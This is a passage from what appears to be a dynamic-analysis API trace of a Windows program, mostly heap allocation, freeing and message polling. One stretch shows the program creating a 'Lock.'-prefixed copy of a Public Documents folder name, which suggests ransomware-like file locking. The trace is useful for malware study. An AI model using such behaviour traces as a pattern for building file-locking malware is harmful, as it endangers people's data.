lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.235] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0267.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0267.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0267.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0267.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0267.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0267.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0267.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0267.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0267.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0267.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0267.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0267.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0267.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0267.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0267.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0267.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0267.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0267.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0267.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0267.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0267.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0267.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0267.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0267.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0267.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0267.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0267.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0267.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0267.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0267.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0267.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0267.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0267.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0267.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0267.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0267.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0267.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0267.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0267.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0267.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0267.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0267.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0267.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0267.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0267.239] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.239] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.239] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.239] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.239] CreateFileW (lpFileName="C:\\Users\\Public\\Documents/My Music" (normalized: "c:\\users\\public\\documents\\my music"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0267.239] GetLastError () returned 0x5 [0267.239] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.239] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.239] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.240] CreateFileW (lpFileName="C:\\Users\\Public\\Documents/Lock.My Music" (normalized: "c:\\users\\public\\documents\\lock.my music"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0267.240] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.240] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.240] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.240] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.240] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.241] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.241] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.241] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0267.241] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0267.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0267.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0267.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0267.241] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0267.241] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.241] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0267.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0267.241] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0267.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0267.242] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0267.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0267.242] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0267.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0267.242] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0267.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0267.242] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0267.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0267.242] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0267.242] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0267.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0267.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0267.243] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0267.243] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.243] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0267.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0267.243] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.243] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0267.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0267.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.243] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.243] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.244] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0267.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0267.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.244] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.244] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0267.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0267.244] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0267.244] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0267.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0267.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.245] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0267.245] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.245] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0267.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0267.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.245] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.245] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.245] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0267.245] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0267.245] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.246] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0267.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0267.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0267.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0267.246] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.246] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0267.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0267.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0267.246] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.246] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.246] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0267.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0267.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0267.247] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0267.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0267.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0267.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0267.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0267.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0267.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0267.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0267.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0267.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0267.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0267.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0267.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 